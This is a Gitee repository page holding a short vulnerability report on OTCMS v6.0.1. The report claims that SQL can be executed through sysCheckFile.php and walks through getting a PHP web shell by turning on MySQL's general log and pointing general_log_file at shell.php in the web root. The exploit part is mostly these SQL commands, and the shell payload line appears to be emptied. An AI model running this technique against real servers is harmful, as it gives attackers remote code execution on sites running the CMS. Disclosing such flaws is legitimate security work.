1 Star 0 Fork 0

wkstestete / cve

加入 Gitee
与超过 1000 万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
upload1.md 924 Bytes
一键复制 编辑 Web IDE 原始数据 按行查看 历史
wkstestete 提交于 2023-03-21 02:18 . update upload/upload1.md.

There is a file upload vulnerability OTCMS v6.0.1

There is a vulnerability file:sysCheckFile.php

1.SQL statements can be executed here 输入图片说明 2.By writing to the php log file getshell

show variables like '%general%';
输入图片说明 输入图片说明

SET GLOBAL general_log='on';

输入图片说明

set global

general_log_file='E:/Test/phpstudy/WWW/CMS/OTCMS_PHP_V6.01/OTCMS_PHP_V6.01_20210518/shell.php';

输入图片说明 The shell.php file is automatically generated in this directory 输入图片说明

Write a sentence through the log file

select ''; 输入图片说明 Access the shell.php file 输入图片说明

1
https://gitee.com/wkstestete/cve.git
git@gitee.com:wkstestete/cve.git
wkstestete
cve
cve
master

搜索帮助